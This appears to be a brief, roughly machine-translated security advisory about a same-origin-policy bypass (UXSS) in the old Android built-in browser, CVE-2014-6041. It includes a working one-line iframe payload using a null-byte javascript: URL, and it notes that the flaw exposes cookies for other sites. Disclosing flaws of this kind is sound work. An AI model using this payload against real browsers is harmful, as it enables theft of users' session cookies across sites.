Android built-in browser cross-domain vulnerabilities UXSS-a vulnerability warning-the black bar safety net

2014-09-05T00:00:00
ID MYHACK58:62201453207
Type myhack58
Reporter 佚名
Modified 2014-09-05T00:00:00

Description

Related links: http://www.rafayhackingarticles.net/2014/08/android-browser-same-origin-policy.html

Test Link: http://x7s.pw/001.html

> <iframe name="m" src="http://www.myhack58.com/" onload="window. open('\u0000javascript:alert(document. location)','m')" >

Genesis: because the Android built-in browser to use an older version of the Chromium kernel, so is introduced the old version of the history of the vulnerability, a new version has been fixed, the exploitation of this vulnerability can easily get the user the website's cookies, a variety of call Android built-in Browser the browser and app a Cheap Shot in!

!

CVE-2 0 1 4-6 0 4 1